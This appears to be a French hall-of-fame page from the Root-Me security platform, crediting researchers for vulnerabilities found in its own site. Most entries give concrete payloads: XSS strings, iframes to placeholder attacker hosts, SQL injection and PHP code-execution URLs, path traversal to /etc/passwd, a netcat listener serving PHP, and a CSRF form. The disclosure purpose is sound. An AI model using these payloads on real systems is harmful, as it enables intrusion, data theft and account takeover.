Faiblesses découvertes

Comme n’importe quel système d’informations ce portail comporte des vulnérabilités...

11/07/2022 Abyss Watcher

a identifié une vulnérabilité de type XSS enregistrée dans n’importe quel champ mis en forme :

<iframe src="https://[attacker_controlled_url]/xss.html" hidden></iframe>

17/03/2022 Mizu

a identifié une vulnérabilité de type XSS enregistrée dans n’importe quel champ mis en forme :

<iframe src="https://www.root-me.org.evil.domain/">

23/11/2021 zLade

a identifié une vulnérabilité permettant à un membre de l’association d’élever son rôle vers celui administrateur simplement en utilisant l’interface privée de SPIP.

01/10/2021 Podalirius

a identifié une vulnérabilité de type faiblesse du contrôle d’accès permettant d’accéder aux documents joints aux solutions sans restrictions :

<imgXX>

15/05/2020 Laluka

a identifié plusieurs vulnérabilités : 3 XSS réfléchies, 2 SQLi et 1 RCE :

https://www.root-me.org/ecrire/?exec=plan&null=lalu%27%20onmouseover=alert(domain)%20style=%27width:9999999px;height:9999999px;%27%20foo=
https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=lalu%27https://www.root-me.org/%3E%3Ca%20href=err%20onfocus=alert(domain)%20autofocus/%3E
https://www.root-me.org/ecrire/?exec=admin_plugin&var_profile=pouet'/><script>alert(document.domain)</script>
https://www.root-me.org/ecrire/?exec=article_edit&lier_trad=1+AND+1%3D2%20union%20all%20select%201,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25;--
https://www.root-me.org/ecrire/?exec=accueil&where[]=(SELECT%20SLEEP(5)=1);--+-
https://www.root-me.org/ecrire/?exec=article&id_article=1&ajouter=non&tri_liste_aut=statut&deplacer=oui&_oups=%27%3C?php%20echo%20fread(popen(%22id%22,%20%22r%22),%20300);?%3E

12/01/2020 NonStandardModel

a identifié une vulnérabilité de type XSS sur le nom du fichier importé sur http://repository.root-me.org/

04/06/2019 x code

a identifié une vulnérabilité de type XSS. Celle-ci nécessitait une intervention de l’utilisateur sur la chatbox (un clic sur page précédente).

http://www.root-me.org/data:%2F%2Ftext/html,<script>alert(1)<%2Fscript>

04/06/2019 x code

a identifié une vulnérabilité permettant de tuer, avec un utilisateur non privilégié, la base de donnée disponible sur le serveur challenge01 qui héberge plusieurs challenges, en saturant la mémoire de façon particulière afin de tuer le processus de son choix. Cela a permis de relancer un autre binaire à la place en écoute sur le même port via une race condition.

16/11/2018 Shrewk

a identifié une vulnérabilité permettant de piéger les utilisateurs de la boutique à travers une iframe via un domaine spreadshirt contrôlé par l’attaquant (ex : spreadshirt.ro), le paramètre lang n’était pas filtré correctement.

12/04/2018 DrStache & urandom

ont identifié une vulnérabilité de type stored XSS dans la carte d’OSM dans les salles de CTFATD en injectant la payload suivante dans la bio de l’utilisateur (https://www.root-me.org/?page=preferences&lang=fr)

<svg onload=console.log(document.domain)>

12/10/2015 ST4HLKR1EG

a identifié une vulnérabilité de type "référence indirecte à un objet non sécurisée" permettant de lire n’importe quel message privé :

page=messagerie&formulaire_action=messages_recus&formulaire_action_args=[valeur_random]&id_auteur=[id_auteur]&selection=sel&marquer_non_lus=marquer+comme+non+lu&selectionne[]=[ID_du_message]

03/2015 WtF

a identifié une vulnérabilité de type remote code execution (RCE) dans un challenge en cours d’évalution sur le serveur de production lui permettant entre autre d’accéder au système de fichier avec ssh et d’éxécuter des commandes.

03/2015 WtF

a identifié une vulnérabilité de type inclusion de fichiers arbitraire (LFI) dans le challenge web-serveur Path Truncation lui permettant entre autre de lire les fichiers d’autre challenges.

15/06/2013 LouTerrailloune

a identifié une vulnérabilité de type injection de code PHP sur la page "coder - décoder" :

Texte à décoder en base64 :

PD9waHAgcGhwaW5mbygpOyA/Pg==

06/11/2012 crown

a identifié plusieurs vulnérabilités de type stored XSS, notamment sur les champs "nom_site" et "url_site" mais également sur le champs "nom" utilisé pendant l’inscription :

<script>[code javascript/vbscript]</script>

20/03/2012 jimee

a identifié une vulnérabilité de type inclusion de fichiers arbitraire (LFI) dans un challenge lui permettant entre autre de lire les fichiers d’autre challenges :

http://www.root-me.org/challenge/hidden/hidden/page_..%252f..%252f..%252fch1%252fmesfonction.php

23/10/2011 courte66

a identifié une vulnérabilité de type reflected XSS sur la page "coder - décoder" :

Texte à décoder en base64 :

Jz4iPjxpbWcgc3JjPWxvbCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSkgLz4=

02/10/2011 Hypnoze

a identifié une vulnérabilité de type "référence indirecte à un objet non sécurisée" permettant de lire les messages privés de tous les membres :

http://www.root-me.org/spip.php?page=messagerie&id=write&repondre=[id_message_a_lire]

18/07/2011 g0uZ

a identifié une vulnérabilité de type injection de code PHP sur la page "outils en ligne : nmap", permettant entre autre d’exécuter des commandes système avec les privilèges de l’utilisateur exécutant le service HTTP.

hôte a scanner en mode -sV :

--version-trace -p8888 [IP serveur maîtrisé]

Service en écoute sur le serveur maîtrisé :

i=0; while [ $i -lt 5 ]; do nc -v -l -p 8888 -e '<?php [CODE PHP];?>'; i=$(( $i+1 )); done

30/06/2011 elyfean

a identifié une vulnérabilité de type CSRF sur la chatbox. Cela permettait entre autre de faire poster n’importe quoi à une personne authentifiée sur le portail visitant une page piégée avec ce code :

<form id="form" action="http//www.root-me.org/?lang=fr" method="post">
<input type=hidden name="ON" value="1">
<input type=hidden name="message" value="0wn3d !">
</form>

15/02/2011 EsSandre

a identifié une vulnérabilité de type inclusion de fichiers locaux (LFI) permettant de lire le contenu de n’importe quel fichier accessible en lecture au serveur web :

http://www.root-me.org/squelettes/script/protection_acces_http.php?file=../../../../../../../etc/passwd

02/02/2011 hello

a identifié plusieurs vulnérabilités de type stored XSS, notamment dans le corps d’un message privé et sur les champs "login" et "nom" du formulaire d’inscription :

<script>[code javascript/vbscript]</script>

02/12/2009 real

a identifié une injection de PHP sur la page poster.html. Cela permettait entre autre d’exécuter des commandes système avec les privilèges de l’utilisateur exécutant le service HTTP :

http://www.root-me.org/spip.php?page=poster&id_article=1'.system('pwd').'